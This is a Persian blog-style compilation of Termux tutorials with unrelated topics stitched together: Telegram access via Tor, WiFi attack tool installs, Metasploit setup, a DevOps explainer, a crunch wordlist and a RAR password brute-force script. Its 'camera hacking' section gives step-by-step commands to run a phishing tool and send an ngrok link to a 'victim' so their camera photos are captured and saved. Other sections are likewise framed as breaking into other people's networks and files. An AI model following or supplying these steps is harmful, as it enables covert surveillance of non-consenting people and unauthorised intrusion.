hacking telegram by termux?

بسیاری از کاربران آموزش تست نفوذ و هک تلگرام با ترموکس را درخواست کرده اند، در این مقاله روش هک تلگرام با ترموکس در اندروید را بررسی خواهیم کرد، همراه داتیس نتورک باشید.

هک تلگرام با ترموکس ممکن است؟!

بسیاری از کاربران آموزش تست نفوذ و هک Telegram با ترموکس را درخواست کرده اند که با توجه به حجم بالای پیام ها تصمیم گرفتیم در مقاله ای به بررسی امکان این مسئله بپردازیم.

پیام رسان تلگرام عضویت کاربران را با استفاده از شماره تلفن همراه امکان پذیر کرده است و کاربران هنگام عضویت یک کد با پیامک دریافت می کنند و با وارد کردن آن کد می توانند ثبت نام کنند و یا دوباره وارد اکانت تلگرام خودشان شوند.

بنابر این برخلاف اپلیکیشن هایی مثل اینستاگرام یا فیس بوک و لاین و … امکان تعریف پسورد برای ورود وجود ندارد.

مرحله اول شما برای وارد شدن به اکانت تلگرام دریافت کد روی خط تلفن ثبت شده است و حالا برای امنیت بیشتر هم می توان در مرحله دوم رمز ورود تعریف کرد.

در حالی که در اینستاگرام دقیقا عکس این مسئله اتفاق می افتد و شما می توانید با ایمیل هم اکانت بسازید.

در هک اینستاگرام به کمک ترموکس از روش های امتحان پسورد روی آیدی استفاده می کردیم، در حالی که در تلگرام اصلا امکان همچین مسئله ای وجود ندارد.

ترموکس در واقع همان لینوکس است که بر روی اندروید نصب می شود و امکان استفاده از قابلیت های لینوکس کالی را به کاربر می دهد.

در حال حاضر هیچ ابزاری برای تست نفوذ به تلگرام به کمک ترموکس وجود ندارد!

کل دیپ وب و دارک وب را زیرورو کردیم اما هیچ ابزاری برای تست نفوذ و هک تلگرام با ترموکس پیدا نکردیم، بنابر این به قول معروف جمله “گشتم نبود نگرد نیست!” درباره این مسئله نیز صادق است.

اما آیا واقعا هیچ راهی برای هک Telegram وجود ندارد؟!

امنیت هیچ وقت مطلق نیست و حتما راه هایی وجود دارد که می توان به کمک آن ها به سرور های تلگرام نفوذ کرد.

اما این کار افراد مبتدی و تازه کار نیست و تنها نابغه های امنیت می توانند این چالش را داشته باشند.

البته این به این معنی نیست که اکانت تلگرام کسی هک نمی شود.

روش هایی وجود دارد که اصطلاحا به آن ها هک اجتماعی یا مهندسی اجتماعی گفته می شود.

هکر با استفاده از این ترفند ها با کمک خود شخص به اکانت دسترسی پیدا می کند.

یک مثال بزنیم برای هک تلگرام به روش مهندسی اجتماعی!

مدتی بود افرادی خود را به جای پشتیبان رسمی تلگرام جا میزدند.

این افراد به شما پیام هایی می دادند که در نگاه اول همه فکر می کردند پیام واقعا از سمت تلگرام آمده است چرا که تصویر پروفایل و ظاهر را کاملا حرفه ای درست کرده بودند.

این اکانت های جعلی از شما می خواستند که برای احراز هویت و بلاک نشدن اکانت تلگرام باید کد ارسالی را برای آن ها از طریق چت ارسال کنید.

و بسیاری از افراد بدون تحقیق در این باره، کد ارسالی تلگرام را در اختیار هکر قرار می دادند.

به این ترتیب هکر موفق به هک تلگرام شما می شد.

در هک اجتماعی روش ها و ترفند های مختلفی استفاده می شود، بنابر این همواره مواظب باشید در دام این شیادان گرفتار نشوید.

connection by telegram by termux

تلگرام در تاریخ ۱۰ اردیبهشت سال ۹۷ از دسترس کاربران خارج شد و فقط تنها با فیلتر شکن قادر به اتصال مجدد به این اپلیکیشن فراهم شد.

زیرا توسط مراجع قضایی این اپلیکیشن به طور کامل فیلتر شد.

از زمانی که تلگرام فیلتر شد کاربران سراغ انواع مختلف فیلترشکن ها رفتند و سعی بر فعالیت دوباره در تلگرام با فیلترشکن را داشتند و هنوز هم دارند.

اما این فیلترشکن ها به دلیل اینکه رایگان هستند با قطع و وصلی مداوم همراه هستند و برای متصل شدن به تلگرام کاربران را خسته میکنند.

در ادامه با میبایل به آموزش متصل شدن به تلگرام با ترموکس میپردازیم با ما همراه باشید…

متصل شدن به تلگرام با نرم افزار termux در اندروید

ترموکس یک نرم افزار قدرتمند هکینگ میباشد که با وارد کردن کد های برنامه نویسی میتوان اقدام به هک برخی از اپلیکیشن ها و… نمود.

عملکرد این نرم افزار همانند کالی لینوکس کامپیوتر میباشد و کار های آن را در اندروید انجام میدهد.

ما امروز میخواهیم با استفاده از این نرم افزار با وارد کردن کد اقدام به دور زدن فیلتر تلگرام کنیم کار با این نرم افزار تقریبا آسان میباشد با ما همراه باشید.

توجه کنید که راه اندازی اولیه این نرم افزار باید با فیلترشکن انجام شود.

این نرم افزار به تازگی فیلتر شده و فقط نصب اولیه آن نیاز به فیلترشکن دارد.

ابتدا این نرم افزار را از اینجا دانلود کنید.

سپس اقدام به نصب (install) آن کنید.

بعد از این که عملیات نصب به اتمام رسید وارد برنامه نشوید و اول از همه فیلترشکن خود را فعال کنید.

بعد از اینکه فیلترشکن خود را فعال کردید وارد برنامه ترموکس شده و صبر کنید نصب افزونه های داخلی ترموکس به اتمام برسد.

حالا صفحه سیاه رنگی حاوی چند خط کد مشاهده خواهید کرد که باید در قدم اول عبارت “pkg update” را وارد کنید

دکمه تایید را بزنید (توجه کنید که حتما باید با حروف کوچک تایپ کنید)

بعد از اینکه شما این عبارت را وارد کردید از شما میپرسد که آیا ادامه میدهید؟

شما با وارد کردن کلمه “Y” مجاز به ادامه عملیات خواهید بود و اگر مجددا بعد از نصب شدن چند کد دیگر عملیات متوقف شد

دوباره “Y” را تایپ و تایید کنید

بعد از نصب کد ها وارد مرحله بعد خواهیم شد در این مرحله عبارت “pkg install tor” را وارد کنید

منتظر بمانید تا عملیات به اتمام برسد.

در حین نصب دوباره از شما سوال میپرسد که آیا ادامه میدهید؟

همانند بالا کلمه “Y” را تایپ کنید و منتظر بمانید تا نصب با موفقیت انجام شود

بعد از اتمام نصب وارد مرحله سوم خواهید شد در این مرحله باید عبارت “tor” را وارد کنید و روی دکمه تایید کلیک کنید.

این مرحله اخرین مرحله ما در این نرم افزار خواهد بود و کار ما در این نرم افزار به اتمام میرسد.

• حالا از برنامه خارج شده و فیلترشکن خود را غیر فعال کنید

در قسمت دوم آموزش وارد تلگرام خود شده و به تنظیمات تلگرام بروید

در این قسمت روی گزینه “data and storage” کلیک کنید

در انتهای صفحه روی “proxy settings” کلیک کنید.

در این صفحه روی “add proxy” کلیک کنید

و در کادر server اعداد “۱۲۷.۰.۰.۱″ را وارد کنید،در کادر بعدی که port میباشد عدد “۹۰۵۰” را وارد کنید و روی تیک بالای صفحه کلیک کنید

اگر در اتصال به تلگرام با ترموکس با مشکل مواجه شده اید کد زیر را در ترموکس کپی کرده و عبارت tor را بزنید تا متصل شود

pkg install tor obfs4proxy -y

بعد از اینکه تغییرات را ذخیره نمودید تلگرام را یک بار ببندید و مجددا راه اندازی کنید تا بعد از چند ثانیه تلگرام بدون فیلترشکن راه اندازی شود.

یک نقصی که این برنامه دارد این است که با هر بار خاموش و روشن شدن (ریستارت) شدن گوشی باید دوباره اقدام به وارد کردن کد در ترموکس کنید تا دوباره تلگرام فعال شود برای این کار نیازی نیست تمام کد های بالا را دوباره وارد کنید فقط باید عبارت tor را وارد کنید و شاهد متصل شدن مجدد تلگرام خواهید بود.

در این روش حتی نیاز نیست مدام پروکسی عوض کنید و پروکسی این روش انقضا ندارد و به طور خودکار بروز میشود.

hacking wifi

ترموکس (Termux) در اندروید ابزارهایی در اختیار ما قرار می دهد که بتوانیم سراغ هک وای فای با ترموکس برویم، لازم به ذکر است ترموکس یک برنامه شبیه ساز ترمینال لینوکس است که میخواهیم هک Wi-fi را با آن انجام دهیم و در مقالات پیشین مفصل درباره آن صحبت کردیم:

ترموکس چیست ؟ ترموکس را چگونه نصب کنیم؟

خب، هک وای فای در کالی لینوکس را قبلا آموزش دادیم، اما اکنون قصد داریم روش تست نفوذ به شبکه های وای فای از طریق ابزار جانبی در اندروید و گوشی های همراه را به شما کاربران محترم داتیس نتورک آموزش دهیم.

بهترین برنامه های هک وای فای در اندروید

نکته : دوستان گرامی لطفا از این آموزش ها برای خراب کاری استفاده نکنید، هدف ما از آموزش این روش ها صرفا تست امنیت است و باید یک متخصص امنیت همواره وجدان و شرافت را به همراه داشته باشد و در فرهنگ و آیین کشور ما نیز آسیب و سوئ استفاده از دیگران جایی ندارد.

پکیج آموزش کامل کار با ترموکس + کتاب PDF فارسی

روش اول : ابزار autoScript برای هک Wifi

autoScript یک برنامه لینوکس است ، که بطور اختصاصی برای Kali Linux طراحی شده است ، که حملات رایج WiFi را انجام می دهد و آنها را به یک برنامه آسان برای استفاده تبدیل می کند.

ابتدا دستور زیر را برای آپدیت ابزار ها بزنید :

apt update && apt upgrade

سپس فایل را از گیت هاب کلون می کنیم:

git clone https://github.com/Treebug842/autoScript.git

حالا با دستور زیر به دایرکتوری فایل دانلود شده می رویم :

cd autoScript

حالا دستور زیر را می زنیم تا ابزار نصب شود :

bash ./install

پس از تکمیل نصب، با زدن دستور زیر می توانید راهنمای ابزار را مطالعه کنید :

autoScript help

و برای اجرا از دستور زیر استفاده کنید :

autoScript run

روش دوم: Routersploit برای هک وای فای در ترموکس

یکی از ابزارهایی که می تواند امکان هک وای فای با ترموکس را در اختیار ما قرار دهد ابزار هک Routersploit hacking tool است که انجام مراحل زیر می توانید آن را نصب کنید:

بیشتر بخوانید  دانلود AnyDesk برای اندروید - برنامه ریموت دسکتاپ انی دسک برای اندروید

ترموکس را باز کنید و دستور زیر را بزنید:

apt update && apt upgrade

سپس دستور زیر را بزنید:

pkg install python

سپس این دستور را وارد کنید:

pkg install git

با دستور زیر ابزار را دریافت کنید:

git clone https://www.github.com/threat9/routersploit

با دستور زیر وارد مسیر پوشه مربوطه می شویم :

cd routersploit

سپس دستور زیر را بزنید:

python3 -m pip install -r requirements.txt

و در نهایت:

python3 rsf.py

خب ابزار با موفقیت اضافه شد و اکنون می توانید از آن استفاده کنید، اگر با Routersploit  آشنایی ندارید نگران نباشید و داکیومنت این ابزار را در لینک زیر مطالعه کنید:

https://tools.kali.org/exploitation-tools/routersploit

روش سوم : برنامه Wifite در ترموکس

این برنامه ابزار های کاربردی فراوانی برای تست شبکه های وای فای در اختیار شما قرار می دهد که خوشبختانه امکان نصب آن روی ترموکس نیز وجود دارد و در نتیجه امکان هک وای فای با ترموکس را در اختیار شما قرار می دهد.

برای نصب ابتدا دستور زیر را وارد کنید:

apt update && apt upgrade

سپس :

Pkg install wget

و در ادامه با دستور زیر ادامه می دهیم :

 pkg install python2

با دستور زیر ابزار Wifite را دانلود می کنیم:

 wget https://raw.github.com/derv82/wifite/master/wifite.py

حالا این دستور را می زنیم تا دسترسی مورد نیاز را به برنامه بدهیم:

chmod +x wifite.py

خب نصب تمام! حالا برای ادامه هک وای فای با ترموکس کافی است دستور زیر را در ترموکس وارد کنید:

 python2 wifite.py

این برنامه برای اجرا نیاز به دسترسی Superuser دارد و اگر گوشی شما روت نیست بنابراین با نصب sudo تلاش کنید.

make logo by termux

برای ساخت لوگو فقط دستورات زیر رو بزنین

apt update

 

apt upgrade

 

pkg install toilet

 

toilet -f mono12 -F gay "اسم"

 

call by termux

تا حالا شده بخوایند با یکی تماس بگیرید اما نتونید اونم به خاطره اینکه شارژ نداشته باشید یا بخوانید به کی در یک کشور دیگه زنگ بزنید ولی به خاطره هزینه های بالا نتونید این کارا انجام بدید...

 

آمـوزش #termux دارم براتون  امیدوارم خوشتون بیاد...

 

 آموزش تماس بی نهایت با termux : فقط کافیه دستورات زیر رو یکی یکی وارد کنید

apt update

pkg install termux-api

(termux-telephony-call (number

 

جای number شماره مورد نظر رو وارد کنید 

termux metasploit

در این پست چگونگی نصب فریم ورک متاسپلویت در ترموکس را بررسی میکنیم. متااسپلویت یک ابزار کامل است که شامل تمامی اکسپلویت های منتشر شده برای سیستم ها میباشد و یک نفوذگر با داشتن این ابزار میتواند از تمامی آسیب پذیری های یک سیستم استفاده کافی را ببرد.

لازمه های این کار:

۱) Android 5.0 + (نسخه های قدیمی پشتیبانی نمی شوند)
۲) TermuX (دانلود آن از Google Play)
۳) حدود ۱ گیگابایت فضای ذخیره سازی داخلی (برای نصب مناسب Metasploit)

نصب برنامه ترموکس

ابتدا TermuX را از Google Play دانلود و نصب کنید. همچنین میتوانید آخرین نسخه ترموکس را از اینجا دانلود کنید.

پس از نصب TermuX، مراحل زیر را دنبال کنید:

نصب Metasploit

برای نصب Metasploit-Framework در TermuX، دستورات زیر را به دقت در برنامه و محیط ترمینال گونه ان وارد کنید و منتظر بمانید تا پکیج های ان به طور کامل نصب شوند.

اول از همه، ما باید اسکریپت git را نصب کنیم، البته اگر قبلا نصب نکرده باشیم. برای این کار از دستور زیر استفاده کنید:

pkg install git

سپس برای کلون کردن متاسپلویت از گیت هاب دستور زیر را وارد میکنیم:

git clone https://github.com/Hax4us/Metasploit_termux.git

سپس وارد دایرکتوری کلون شده میشویم و مجوزهای لازم را اعمال میکنیم:

cd Metasploit_termux 
chmod +x metasploit.sh

سپس با دستور زیر اجرا میکنیم:

./metasploit.sh

این اسکریپت آخرین نسخه Metasploit را نصب می کند. همچنین شامل برخی از افزونه ها برای به روز رسانی Metasploit است. اگر همه چیز خوب پیش برود، به غیر از هشدارهای رنگی قرمز، شما می توانید Metasploit را در ترموکس خود اجرا کنید.

رفع ارور ها در فرایند نصب فریم ورک Metasploit

در صورتی که در فرایند نصب با ارورهایی مواجه شدیم، میتوانیم از دستورات زیر برای رفع ارورها استفاده کنیم:

apt -y install git ruby ruby-dev make clang autoconf curl wget ncurses-utils libsqlite-dev postgresql postgresql-dev libpcap-dev libffi-dev libxslt-dev pkg-config
cd metasploit-framework 
bundle install 
bundle update nokogiri (package name will be another)

devops

معرفی مفاهیم DevOps

DevOps چیست؟

قبل از اینکه به این سوال پاسخ دهم باید بگویم که DevOps چارچوب و استاندارد خاصی ندارد و تنها یک مفهوم پراکنده است، شغل هایی در عنوان مهندس DevOps که میبینید ممکن است با یکدیگر بسیار متفاوت باشند و نیازمندی های بسیار متفاوتی داشته باشند، چرا که هر شرکت بر اساس نیاز خود وظایف مهندس DevOps را تشریح می کند. در ادامه بیشتر به این مسئله خواهم پرداخت.

ساده ترین تعریفی که میتوانم برای DevOps بگویم این است که مفهوم و مجموعه ای از روش هاست که سبب می شود پروسه های توسعه نرم افزار و عملیات های IT یکپارچه تر شوند. این یکپارچگی فاصله بین این دو پروسه را کم و تعامل بین اعضای این دو تیم را بسیار بهینه تر می کند، بطوری که سرعت چرخه تولید و نگهداری نرم افزار بسیار بالاتر می رود. این نکته را هم بگویم که این روش در تیم های نسبتا کوچک جوابگو است و در تیم های بزرگ ارتباط بین اعضای مجموعه با یکدیگر کمتر است.

یکی از مشکلاتی که باعث می شود DevOps کار بودن کم معنی و بدون استاندارد باشد، تنوع بسیار زیاد تکنولوژی های مورد استفاده در هر مرحله و نیاز به تسلط بر تکنولوژی مورد استفاده است که باعث می شود چیزی بعنوان یک DevOps کار کامل وجود نداشته باشد. به همین دلیل دقیقا مشخص نیست یک متخصص DevOps باید چه چیزهایی بلد باشد. بعضی اوقات خطایابی را نیز یک DevOps کار انجام میدهد و حتی رفع آن خطا را نیز انجام میدهد.

عکس زیر پروسه های توسعه و نگهداری نرم افزار را نشان میدهد که در ادامه نقش یک مهندس DevOps در هر کدام از مراحل توضیح خواهم داد:

مرحله Planning

در این مرحله آنالیز نیازمندی های برنامه و بعد برنامه ریزی برای توسعه و نگهداری برنامه صورت می گیرد. قطعا اگر کسی بر هر دو وجه یعنی وجه توسعه و وجه نگهداری تسلط داشته باشد، دید گسترده و تخصصی ای دارد که میتواند تصمیمات بسیار بهینه تری برای برنامه ریزی، نحوه پیاده سازی بخصوص Technology Stack داشته باشد. بعنوان مثال شاید دو مدل دیتابیس دو نیازمندی مختلف برنامه را بهتر جوابگو باشند اما نگهداری را سخت تر کند، و حتی در توسعه نیاز باشد که جدا جدا پیاده سازی شوند، در حالی که یک DevOps کار دید گسترده ای بر تکنولوژی های مختلف دارد و میتواند برای این دو نیاز مختلف گزینه های بهتری ارائه کند، بعنوان مثال دیتابیسی انتخاب کند که جوابگوی هر دو نیاز باشد و توسعه و نگهداری موارد مربوط به دیتابیس را راحت تر کند.

مرحله Implementation

در این مرحله توسعه کد بر اساس مستندات تهیه شده در مرحله Planning صورت می گیرد. یک متخصص DevOps معمولا وظیفه نگهداری و پشتیبانی repository ها را دارد، شامل مانیتور کردن روند توسعه و پیشگیری از merge confict و یا رفع آن در صورت وقوع، همچنین توسعه کدهای اتومات کردن پروسه هایی مانند ساخت CHANGELOG معمولا بر عهده یک DevOps کار است. در بعضی موارد ساخت بعضی از ابزارها را نیز بر عهده DevOps کار میگذارند.

مرحله Verify

مرحله ای است که تست برنامه صورت میگیرد، یک DevOps کار معمولا وظیفه انجام تمام سطوح تست و Quality Assurance را داراست. بطور معمول این کارها بصورت اتومات صورت میگیرد و بعضی نیز توسط دیگر افراد تیم. بعنوان مثال Quality Assurance معمولا بصورت دستی انجام می شود. یکی از پر طرفدارترین تکنیک های verification در توسعه Continuous Integration می باشد. در CI تست برنامه ها بصورت متداول و برای هر تغییر نهایی، مانند commit، صورت میگیرد. نقش یک DevOps کار معمولا اتومات کردن این روند است. با استفاده از ابزارهایی مانند Jenkins، Travis CI، Gitlab Runner و غیره این کار بسیار راحتتر شده است.

مرحله Packaging

در این مرحله عملیات های بسته بندی یک نرم افزار انجام میشود. بسته بندی یک نرم افزار یعنی محیا کردن یک پکیج که خود برنامه و نصب کننده و آماده کننده environment در آن قرار میگیرند. در بعضی موارد Document های نحوه استفاده نیز در همان پکیج قرار میگیرند. وظیفه یک DevOps کار آماده سازی اسکریپت های لازم برای این پکیج بندی و بعضی اوقات حتی ساخت برنامه ی نصب هم هست.

یکی از ابزارهای پر طرفدار پکیج بندی docker می باشد که یک محیط ساخته و به راحتی Deploy میشود و همینطور ویژگی هایی مانند ایزوله سازی، قابلیت جا به جایی سریع و راحت، قابلیت آپدیت راحت و غیره را به ارمغان می آورد.

مرحله Delivery/Deployment

در این مرحله برنامه ساخته برای بهره برداری میرود، اگر یک برنامه standalone برای کاربر باشد، مخازن دانلود آپدیت میشوند مانند وبسایت اصلی برنامه، اگر برنامه یک سرویس ابری باشد بر روی سرورها بارگذاری و فعال میشود.

نقش یک DevOps کار در این مرحله نیز اتومات سازی این عمل است، یعنی بعنوان مثال اگر برنامه قرار است Deploy شود، برنامه قبلی باید آفلاین شود و برنامه جدید جایگزین شده و اجرا شود و این کار باید برای تمامی node های یک ابر انجام شود. اگر یک برنامه برای مشتری است اطلاعات لازمه برای مخازن فرستاده شود.

مانند CI روش CD هم وجود دارد و ممکن است حتی در روز چندین Deploy داشته باشیم.
بسته بندی ای که با داکر انجام میشود کار deploy را بسیار راحتتر میکند. اما کنترل چندین node بسیار سخت میتواند باشد. برای این کار معمولا از kubernetes استفاده میشود، این ابزار همینطور کار را برای کنترل میکروسرویس ها نیز راحتتر میکند.
برای برقرای ارتباط با چندین node نیز از ابزارهایی مانند chef و puppet نیز استفاده میگردد.

مرحله Configure

در این مرحله پیکره بندی انجام میشود. یک برنامه بعد از نصب نیاز به پیکره بندی دارد. از جمله پیکره بندی اختصاصی خود برنامه تا پیکره بندی دیتابیس تا حتی پیکره بندی یک node. که البته پیکره بندی یک node بعد از نصب سیستم عامل صورت میگیرد، ممکن است نسبت به برنامه تغییرات دیگری نیز نیاز باشد که بعدها صورت میگیرد.

باز هم نقش یک DevOps کار اتوماتیک کردن است، هر چند که همزمان کار پیکره بندی نیز انجام میدهد. در این مورد اتومات کردن اینکار با ساخت IaC یا همان Infrastructure as Code صورت میگیرد.
برای آسان سازی مدیریت پیکره بندی ابزارهایی مانند Chef، Puppet، Ansible و SaltStack وجود دارند که هرکدام DSL یا همان Domain-Specific Language خود را دارند.

با این ابزارها مدیریت پیکره بندی بخصوص زمانی که تعداد node ها زیاد هستند بسیار آسان میشود و دیگر نیاز نیست خیلی از این کارها را دستی بر روی هر node تکرار کنید.

مرحله Monitoring

این مرحله یکی از اساسی ترین مراحل در نگهداری است. در این مرحله تمام اطلاعات در جریان بصورت ممتد کنترل میشوند تا خطاها و کاستی های برنامه به موقع شناسایی شده و عکس العمل مناسب صورت گیرد.

در این مرحله یک DevOps کار معمولا هم کار مانیتورینگ و هم کار اتومات سازی گزارش دهی موارد و اعمال استراتژی ها را انجام میدهد.
بعنوان مثال کار بکآپ گیری را اتومات میکند که در مواقعی مانند هر یک ساعت یک بکآپ از داده های خاصی گرفته و به یک سرور امن فرستاده شود. یا بعنوان مثال در صورت تشخیص یک حمله که منجر به گرفتن دسترسی توسط مهاجم شده و اطلاعات حساسی ممکن است دزدیده شوند، killswitch را فعال تا ارتباط مهاجم به کل قطع شود.

ابزارهای معمول

مجموعه ابزار قابل استفاده برای code base جاوا و سیستم عامل لینوکس:

مجموعه بیشتری از ابزارها:

جمع بندی

در آخر میتوان به این نتیجه رسید که یک DevOps کار در تمامی مراحل توسعه و نگهداری نرم افزار نقش دارد و معمولا کار اتومات سازی را بر عهده دارد که بعضی اوقات حتی بصورت مستقیم نیز در آن مرحله دخیل می شود.

بودن در هر یک از این مراحل نیر نیازمند داشتن تجربه در تکنولوژی های مورد استفاده در آن مرحله و آن پروژه را داراست و این ممکن است در پروژه ای با پروژه دیگر متفاوت باشد و این احتمال بالاست. بنا به این دلایل میتوان گفت شغل DevOps کاملا مشخص نیست و در هر پروژه و شرکت ممکن است متفاوت باشد.

crunch

crunch 8 8 0123456789 -o Desktop/mrpython.lst

در دستور بالا ما یک پسورد لیست درست میکنیم که از ۸ رقم شروع میشه و در ۸ رقم هم تموم میشه(برای وایرلس ها) و در پسورد لیست از اعداد ۰_۹ استفاده میشه.

• ۸ اول تعداد min پسورد و ۸ دوم هم تعداد max پسورد هست که میتونه هر چیزی باشد.
• از -o برای ذخیره سازی لیست ساخته شده استفاده میشود که ما محل دسکتاپ رو انتخاب کردیم.
• کلمه اخرmrpython.lstاسم پسورد لیست ما هست. من فرمتش رو lst انتخاب کردم که در کالی لینوکس همون txt هست و فرقی ندارد.
• شما می توانید کدهای random با کلمات درست کنید. می توانید جلوی اعدادی که نوشتم از a تا z حرف بزارید و لیستی با حروفات درست کنید.
•  

این به خلاقیت شما برمیگرده که چجوری اعداد و حروفات رو بچینید و پسوردلیست قوی درست کنید.

hacking-camera-by-termux

خوب همه تون دوست دارین دوربین گوشی کسی رو هک کنید و سرچ های زیادی کردین که به نتیجه نرسیدین ما  در این مقاله به شما آموزش هک دوربین گوشی با برنامه ترموکس – termux میدهیم به ساده ترین روش و آسون ترین روش در مقاله های قبل آموزش های هک زیادی با ترموکس دادیم با ما تا آخر این آموزش همراه باشید.

ابتدا برای شروع آموزش هک دوربین گوشی برنامه ترموکس دانلود کنید و دسترسی های لازم بهش بدین.

به دسترسی های محل ذخیر برنامه ترموکس برین و دسترسی محل ذخیر یعنی حافظه بدین بهش وقتی دوربین هک کرد عکس فیلم بتونه ذخیره کنه.

خوب بعد از دسترسی داد نقطه اتصال یا هات اسپاد روشن کنید برای پورت فورواردینگ.

پورت فراوردینگ چیست؟

یعنی آدرس مودم شما یا آدرس نقطه اتصال همراه گوشیتون که بقیه بهش وصل میشن رو به اینترنت وصل
میکنه ، مثل یه دامنه سایت ، برای اینکه اون دامنه یا همون لینک رو به قربانی بدیم برای هک کردنش.

 

سپس این دستورات رو به ترتیب در ترموکس وارد کنید و بزارید بسته ها نصب بشن:

apt update
apt upgrade
pkg install wget php git openssl
git clone https://github.com/HACKGM/cam
cd cam
bash cam.sh

هرجایی هم سوال پرسید [n/y [کلمه Y رو بفرستید،
اگه میخواید همه دستورات بالا رو باهمدیگه وارد کنید این رو بزنید :

apt update && apt upgrade && pkg install wget php git openssl curl && git clone
https://github.com/HACKGM/cam && cd cam && bash cam.sh

خب حالا باید تا مرحله نصب رسیده باشید ،
کافیه گزینه ۲ رو بفرستید که با ngtok پورت فراوردینگ انجام بشه و لینکی که باید به قربانی بدید
واستون ارسال بشه،

(اگه در مواقعی پیش اومد که لینک نداد دوباره تست کنید و چک کنید نقطه اتصال همراه روشن باشه و
فیلترشکنتون خاموش باشه)
اگه قربانی دسترسی به دوربین رو نده عکسش براتون ارسال نمیشه و فقط ای پیش میاد،
وقتی عکس قربانی ارسال شد براتون و میخواید سیوش کنید ابتدا دکمه CTRL رو بزنید و بعدش کلمه C
رو بزنید تا به مرحله دریافت اطلاعات قربانی پایان داده بشه ،
سپس دستور ls
رو بزنید تا وارد پوشه عکس ها بشید بعدشم دستور
mv *png /sdcard
رو بزنید تا عکسا توی حافظه داخلی گوشیتون سیو بشن،

اما اگه پورت فراوردینگ ngrok براتون کار نکنه و اصلا لینک بهتون نده چیکار کنیم؟

روش دیگه ای برای پورت فراوردینگ هست که خود گوشی رو تبدیل به لوکال هاست میکنیم تا لینک
بهمون بده، اما این روش فیلتره و نیازه شما و قربانی فیلترشکنتون روشن باشه
برای این کار ما با دستور

cd cam
bash cam.sh

ابزار رو از اول اجرا میکنیم ،( فقط باید ابزار اجرا بشه ، لینک بده یا نده مهم نیست !)

cracking by python

آموزش کرک فایل های وینرار (Winrar) در پایتون:

خب اول باید در واقع حملات علیه این فایل ها رو باهم برسی کنیم و ببینیم اصلا چه شکلی میشه اینا رو کرک کرد .

در واقع اگه بخوایم یکم در مورد حوضه هکینگ صحبت کنیم باید بگم برای اینکه بتونید فایل های winrar رو بدونه داشتن پسووردشون باز کنید به طور کلی دو راه وجود داره :

۱ - اول اینکه یک باگ امنیتی توی همون ورژن نرم افزار وینرار پیدا کنید که بشه پسووردشو باز کرد (معمولا خیلی کم از این روش استفاده میشه)

۲ - دومین راه یا همون راهی که ما امروز ازش استفاده میکنیم ، اجرای حمله ی brute Foce روی فایل وینرار هستش .

 

حمله ی Brute Force چیست ؟ حمله ی بروت فورس در علم رمزنگاری ، حمله ای است که طی اون ما میایم پسوورد های زیادی (گاهی اوقات تمام پسوورد های ممکن) رو تست میکنیم ببینیم کدومش کار میده و پسوورد درست کدومه . خب اگه بخوایم این همه پسوورد رو دستی تست کنیم قطعا به زمانی فوق العاده زیاد نیاز داریم ولی ما میتونیم با نوشتن بعضی اسکریپت ها یا استفاده از بعضی ابزار ها ، پروسه تست پسوورد ها رو بسپاریم به کامپیوتر تا برامون با سرعتی بالا اینکارو انجام بده .

حمله ی بروت فورس رو میشه خیلی جاها پیاده کرد نه صرفا فقط برای فایل های وینرار . ولی ما امروز ازش برای بدست آوردن پسوورد فایل های وینرار استفاده میکنیم (Cracking) .

خب ما برای اینکار نیاز به یک پسوورد لیست داریم . پسوورد لیست یه فایل متنی هستش که داخل اون لیست عظیمی از پسوورد ها وجود دارن . حالا ما میایم تمام این پسوورد های داخل پسوورد لیست رو روی فایلمون (فایل رمزگذاری شده ی وینرار) تست میکنیم ببینیم کدومش جواب میده  .

 

و اما خود اسکریپت .

در واقع ما میایم یه اسکریپت پایتونی میسازیم که یه پسووردلیست از ما میگیره و میاد هر کدوم از پسوورد های پسووردلیست رو روی فایل وینرار تست میکنه . هر کدومش جواب داد یعنی پسوورد همونه .

من یه فایل وینرار میسازم که پسووردش اینه : 123

همچنین یه پسووردلیستی دارم که حاوی تعدادی پسوورده که همین پسوورد 123  هم داخلش هست .

 

برای نوشتن اسکریپت از کتابخونه ی rarfile استفاده میکنیم که کابردش کار با فایل های وینرار هستش . برای نصب این کتابخونه از ابزار pip استفاده میکنیم

 

نصب کتابخونه در لینوکس :

MrPython@debian:~$ sudo pip3 install rarfile

نصب کتابخونه در ویندوز :

C:\> pip install rarfile

 

پس از نصب کتابخونه میریم سراغ سورس کد (پایتون) .

 

سورس :

import rarfile
import sys

rarfile_address = input("RarFile : ")
passwordlist_address = input("Password List : ")

rar_file = rarfile.RarFile(rarfile_address)

passwordlist = open(passwordlist_address)

password_found = False
print("-----------------")
for password in passwordlist:
    password = password.strip("\n")
    print("Testing : {}".format(password))
    try:
        rar_file.setpassword(password)
        rar_file.testrar()
        print("*"*50)
        print("Password : {}".format(password))
        password_found = True
        break
    except rarfile.RarWrongPassword:
        continue

if password_found:
    sys.exit(0)
else:
    print("*"*50)
    print("Sorry I can't find correct Password in your password list :(")

توضیح سورس :

طبق معمول در ابتدا کتابخونه های مورد نیاز رو ایمپورت کردیم . کتابخونه ی rarfile برای باز کردن فایل rar و تست کردن پسوورد و کتابخونه ی sys برای استفاده از متود ()sys.exit برای بستن  اسکریپت .

در خطوط بد دو اینپوت یا ورودی از کاربر گرفتیم . اولی آدرس فایل وینرار هستش که میخوایم کرک کنیم و دومی آدرس پسوورد لیست .

در خط بعدی اومدیم با استفاده از متود rarfile.RarFile فایل وینراری که کاربر آدرسش رو داده رو بارگذاری کردیم و ریختیم داخل متغییر rar_file . (درواقع یه شیء ازش ساختیم) .سپس در خط بعد فایل پسوورد لیست رو با استفاده از تابع open باز کردیم و ریختیم داخل متغییر passwordlist .

پس از اون یه متغییر بولین (boolean) تعریف کردیم به اسم password_found که از طریق این متغییر در آخر برنامه میتونیم بفهمیم پسوورد پیدا شده یا نه .

بعد یه حلقه for نوشتیم که بتونیم از طریق اون به تک تک پسوورد های داخل پسووردلیست دسترسی پیدا کنیم و یکی یکی تستشون کنیم . در حلقه ی for کارهای زیر اتفاق میافته :

